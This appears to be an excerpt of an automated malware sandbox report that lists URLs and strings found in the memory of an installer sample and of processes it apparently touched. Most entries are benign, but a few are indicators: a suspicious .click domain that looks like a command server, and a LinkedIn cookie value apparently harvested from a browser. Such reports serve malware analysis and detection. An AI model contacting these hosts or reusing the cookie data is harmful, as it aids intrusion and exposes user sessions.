        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: soll es sein. Schnell landet das kuriose Gesuch bei Twitter.","url":"https://www.msn.com/de-de/nachrichten/panorama/kaufland-partnersuche-sorgt-f equals www.twitter.com (Twitter)
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000003D5C000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.000000000546C000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.000000001317C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: .www.linkedin.comTRUE/TRUE13336872580273675bscookie"v=1&202108181112191ce8ca8a-2c8f-4463-8512-6f2d1ae6da93AQFkN2vVMNQ3mpf7d5Ecg6Jz9iVIQMh2" equals www.linkedin.com (Linkedin)
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B35000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 00000004.00000002.5572719203.0000000007B53000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: rchten muss.","url":"https://www.msn.com/de-de/nachrichten/politik/wagner-bluff-lukaschenkos-experte-hat-prigoschin-these-kennen-putins-rachsucht/ar-AA1eNDw5","locale":"de-de","isLocalContent":false,"publishedDateTime":"2023-08-04T16:28:39Z","feed":{"id":"Y_2d521030-89ae-4d6f-a3ef-9355218093c3","feedName":"Politik","lastFreActionTimestamp":0},"isFeatured":false,"images":[{"width":630,"height":472,"url":"https://th.bing.com/th?id=ORMS.84b1139a1f513756640f22af62baed5a&pid=Wdp","title":"Politisch unter Druck: Belarus-Machthaber Alexander Lukaschenko (li.) und Kreml-Chef Wladimir Putin (Mi.), hier mit dem Gouverneur von St. Petersburg, Alexander Beglov.","caption":"Politisch unter Druck: Belarus-Machthaber Alexander Lukaschenko (li.) und Kreml-Chef Wladimir Putin (Mi.), hier mit dem Gouverneur von St. Petersburg, Alexander Beglov.","focalRegion":{"x1":337,"x2":575,"y1":124,"y2":201},"source":"msn","colorSamples":[{"isDarkMode":true,"hexColor":"#E4EAEF","isGreyScale":false},{"isDarkMode":false,"hexColor":"#E4EAEF","isGreyScale":false}]}],"colorSamples":[{"isDarkMode":true,"hexColor":"#E4EAEF","isGreyScale":false},{"isDarkMode":false,"hexColor":"#E4EAEF","isGreyScale":false}],"provider":{"id":"AA14H9Np","name":"Merkur","logoUrl":"https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA14H4ei.img","profileId":"vid-pq9604dx2qnekq7b4rd0kufm6nccw5hw9ahgnwr4dns9j776v7ua"},"category":"nachrichten","reactionSummary":{"totalCount":276,"subReactionSummaries":[{"totalCount":223,"type":"downvote"},{"totalCount":53,"type":"upvote"}]},"reactionStatus":"on","commentSummary":{"totalCount":36,"subCommentSummaries":[{"totalCount":15,"type":"comment"},{"totalCount":21,"type":"reply"}]},"commentStatus":"on","position":11,"cardId":18,"reasons":[{"type":"cF_Ip","rank":0},{"type":"default","rank":1,"follow":{"id":"","name":"Unterhaltung","time":""}}],"recoId":"uP1d9rTCzygv0CNSbgsLBZS3wm"},{"id":"AA1eMOvZ","type":"article","title":"Wasserkraftwerk selbst gebaut: Vietnamese zeigt in 14 Minuten, wie es geht","abstract":"Auf YouTube zeigt ein vietnamesischer Bastler, wie er seine eigene Wasserkraftanlage in einem Bach baut. Das System funktioniert mit elektrisch gesteuerten Sch equals www.youtube.com (Youtube)
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
        Source: fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
        Source: explorer.exe, 00000005.00000000.4273113348.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.000000000932B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.000000000932B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5587726838.000000000CEA7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://explorefreeresults.com/10_Best_Fully_Guided_Tours_in_Italy.cfm?domain=ladakhzesmo.com&fp=kXTq
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://explorefreeresults.com/Best_Italy_Tours_for_Seniors_2023.cfm?domain=ladakhzesmo.com&fp=kXTqzi
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://explorefreeresults.com/Senior_Tours_USA.cfm?domain=ladakhzesmo.com&fp=kXTqzi8r3yObxdW3h%2BgrP
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://explorefreeresults.com/display.cfm
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004A74000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000006184000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5572571425.0000000007860000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013E94000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
        Source: fjerbregners_patrol.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: fjerbregners_patrol.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: explorer.exe, 00000005.00000000.4273113348.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CEA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.000000000932B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.000000000932B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5587726838.000000000CEA7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
        Source: explorer.exe, 00000005.00000002.5587726838.000000000CB84000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CB7D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CB81000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crl
        Source: explorer.exe, 00000005.00000002.5587726838.000000000CC96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4938853327.000000000CC96000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5584620041.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000CC96000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: explorer.exe, 00000005.00000002.5581487828.000000000A7A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.4259799715.0000000002C30000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5580560824.000000000A1D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: msdt.exe, 00000004.00000003.4467172915.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
        Source: explorer.exe, 00000005.00000002.5580841811.000000000A6A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fgnvcmef.click
        Source: explorer.exe, 00000005.00000002.5580841811.000000000A6A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fgnvcmef.click/aw8o/
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000649000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.gopher.ftp://ftp.
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.0000000000626000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
        Source: RAVCpl64.exe, 00000003.00000002.5568062940.0000000004108000.00000004.80000000.00040000.00000000.sdmp, msdt.exe, 00000004.00000002.5570292945.0000000005818000.00000004.10000000.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.5600769418.0000000013528000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
        Source: fjerbregners_patrol.exe, 00000002.00000003.3654456834.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000002.3781463520.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3640739946.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3641388802.0000000003B9D000.00000004.00000020.00020000.00000000.sdmp, fjerbregners_patrol.exe, 00000002.00000003.3653833929.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
        Source: fjerbregners_patrol.exe, 00000002.00000001.3579838555.00000000005F2000.00000020.00000001.01000000.00000005.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
        Source: msdt.exe, 00000004.00000002.5572719203.0000000007B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppive.exe
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppw
        Source: explorer.exe, 00000005.00000000.4265412903.000000000910B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5576748869.00000000091B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4928406305.0000000009199000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirm9999
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
        Source: explorer.exe, 00000005.00000003.4933742015.000000000FEE7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4282255001.000000000FEA0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5595640936.000000000FEEC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSdU
        Source: explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
        Source: explorer.exe, 00000005.00000000.4262862311.0000000004E18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5570670853.0000000004E18000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/hb
        Source: explorer.exe, 00000005.00000000.4259830610.0000000002C40000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5587726838.000000000CEA7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
        Source: explorer.exe, 00000005.00000000.4265412903.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4935000339.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.0000000009306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=3076063914DA481793CFCA20D17646AC&timeOut=5000&oc
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4273113348.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5584620041.000000000C9A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
        Source: fjerbregners_patrol.exe, 00000002.00000003.3635785423.0000000003B9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: explorer.exe, 00000005.00000000.4265412903.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.4935000339.0000000009306000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.5577510077.0000000009306000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comXK
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/test/finance/CurrencyReddown.svg
        Source: explorer.exe, 00000005.00000002.5574655339.0000000008FC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/AQI/uspl03.svg
        Source: explorer.exe, 00000005.00000000.4265412903.0000000008FC8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JgArPAA=/Condition/AAehyQC.svg
